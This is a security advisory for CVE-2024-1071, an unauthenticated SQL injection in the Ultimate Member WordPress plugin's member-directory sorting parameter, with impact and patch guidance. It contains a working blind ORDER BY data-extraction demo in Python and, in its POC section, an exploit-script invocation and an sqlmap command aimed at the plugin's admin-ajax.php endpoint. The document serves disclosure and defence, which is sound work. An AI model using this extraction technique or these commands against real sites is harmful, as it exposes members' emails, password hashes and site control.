WordPress Ultimate Member SQL Injection – CVE-2024-1071

Vulnerable Version

versions 2.1.3 to 2.8.2

Fixed Version

version 2.8.3

Base Score

9.8 Critical

Vendor Description:-

The Ultimate Member plugin for WordPress is a robust and user-friendly membership plugin that enables website owners to easily establish and manage user profiles, communities, and membership sites. It includes configurable user roles, front-end registration and login forms, user directories, content restrictions, and more. The plugin is frequently used for social networking sites, online communities, and membership-based platforms. It provides a fully configurable experience with add-ons for increased functionality, such as private messaging, WooCommerce integration, and paid memberships.

CVE-2024-1071 Vulnerability Description:-

The Ultimate Member plugin contains an SQL injection vulnerability in the ‘sorting’ parameter of its member directory listing. The parameter is sent to the /wp-admin/admin-ajax.php endpoint, where the plugin's AJAX handler reads it to decide how the returned user records are ordered; it is used whenever a user directory is displayed or re-sorted.

The root cause is insufficient validation and escaping of the ‘sorting’ value. Instead of mapping the requested sort key onto a fixed, server-defined clause, the plugin interpolates the supplied value into the SQL it builds for the listing. Because the value is inserted as raw SQL rather than as a bound parameter, an attacker controls part of the query text and can append SQL of their own to the ordering expression, which the site's database then executes.

The request does not require authentication: the AJAX action is reachable by anyone who can send a POST to admin-ajax.php, so no account on the site is needed. That, combined with the sensitivity of the data the query can reach, is what drives the 9.8 score and makes a prompt fix necessary.

The vulnerable code path is only reached when the “Enable custom table for usermeta” setting is turned on in the plugin configuration, so sites with that option enabled are the ones that can actually be exploited. Administrators running a vulnerable version with that option enabled should treat this as an immediate priority; everyone else should still update, since the setting can be switched on at any time.
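To make the class of flaw concrete, the following is an added illustration, not the plugin's code or a reproduction of the real vulnerable function: a request-controlled sort key is concatenated straight into ORDER BY, and that single position is enough for an attacker to read arbitrary data one yes/no question at a time, because the row order itself answers the question. Beside it is the allowlist pattern that fixes this class of bug. The table, rows, sort keys and function names are all constructed for the example; the probe uses SQLite syntax so it runs offline, whereas sqlmap's --technique=T against MySQL asks the same questions with SLEEP() and measures the delay instead of reading the order.

```python
import sqlite3

# Constructed stand-in for a member table; not the plugin's schema.
SAMPLE_USERS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]

# Hypothetical sort keys a directory might expose, each mapped to a fixed clause
# chosen by the server. The client never supplies SQL, only one of these keys.
ALLOWED_SORTING = {
    "username_asc": "login ASC",
    "username_desc": "login DESC",
    "email_asc": "email ASC",
}


def make_db() -> sqlite3.Connection:
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def build_query_vulnerable(sorting: str) -> str:
    """The flawed pattern: the request's sorting value lands verbatim in ORDER BY.
    Bound parameters cannot protect this position, since ORDER BY takes
    identifiers and expressions, not values, so concatenation here is injectable."""
    return f"SELECT id, login FROM users ORDER BY {sorting}"


def build_query_safe(sorting: str) -> str:
    """Hardened form: the client picks a key, the server supplies the SQL."""
    if sorting not in ALLOWED_SORTING:
        raise ValueError(f"unsupported sorting key: {sorting!r}")
    return f"SELECT id, login FROM users ORDER BY {ALLOWED_SORTING[sorting]}"


def blind_probe(conn: sqlite3.Connection, condition: str) -> bool:
    """Ask the database one yes/no question using only the sort order.

    The payload orders by id ascending when `condition` holds and descending
    otherwise, so the id of the first row returned leaks one bit.
    """
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    first_id = conn.execute(build_query_vulnerable(payload)).fetchone()[0]
    return first_id == SAMPLE_USERS[0][0]


def _bisect(conn: sqlite3.Connection, predicate, lo: int, hi: int) -> int:
    """Smallest n in [lo, hi] for which the SQL condition predicate(n) is false,
    found with a binary search of blind probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if blind_probe(conn, predicate(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def leak_string(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` through the ORDER BY clause alone:
    first its length, then each character by bisecting its code point."""
    length = _bisect(conn, lambda n: f"length({subquery}) > {n}", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = _bisect(conn, lambda n, p=pos: f"unicode(substr({subquery}, {p}, 1)) > {n}", 0, 127)
        chars.append(chr(code))
    return "".join(chars)


def safe_query_rejects(sorting: str) -> bool:
    """True when the allowlisted builder refuses the given sorting value."""
    try:
        build_query_safe(sorting)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    target = "(SELECT email FROM users WHERE login = 'bob')"
    print("leaked via ORDER BY:", leak_string(db, target))  # bob@example.com
    print("allowlist rejects payload:", safe_query_rejects("(CASE WHEN (1=1) THEN id ELSE -id END)"))
```

The point of the allowlist is that ORDER BY is one of the places a prepared statement cannot help: a placeholder binds a value, and the database would sort by that constant rather than by a column. The only safe design is to accept a key from the client and look up the clause on the server, rejecting anything not in the map, which is also how the time-based probe sqlmap runs against the real endpoint is shut out.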

Impact:-

  • Unauthorized Data Access – Attackers can extract sensitive user data from the database, including email addresses, password hashes, and other private profile details.
  • Database Manipulation – Depending on what the injected SQL can reach, malicious queries may modify, delete, or insert data, disrupting the site.
  • No Authentication Required – The attack can be performed without logging in, so any site running a vulnerable version with the custom usermeta table enabled is exposed to anonymous attackers.
  • Full Site Compromise – Combined with the data obtained (for example, cracked password hashes of administrator accounts) or with other flaws, attackers may gain full control over the website, leading to defacement, malware injection, or a complete takeover.

Mitigations:-

  • Update the Plugin Immediately – The developers fixed the issue in version 2.8.3, released on February 19, 2024. Update the Ultimate Member plugin as soon as possible; attackers are quick to weaponize public SQL injection flaws, so keeping plugins current is the primary defence.
  • Disable the “Enable Custom Table for Usermeta” Option – The vulnerable query path is only reachable when this setting is on. Turning it off closes the exploitable path as an interim measure if you cannot update right away, but it is not a substitute for installing 2.8.3 or later.

POC

Exploit link:- exploit.py (the original post links the script here)

Run the script against the target site:

python3 exploit.py http://<target-url>

Internally the script hands the request to sqlmap for a time-based blind test (--technique=T) of the sorting parameter (-p sorting). In the command as it appears in the script, {args.url} is the target URL passed on the command line and {data} is the POST body the script assembles:

sqlmap -u {args.url}/wp-admin/admin-ajax.php --method POST --data "{data}" --dbms mysql --technique=T -p sorting

Reference link:-

https://www.enciphers.com/exploiting-cve/ultimate-member-plugin-cve-2024-1071
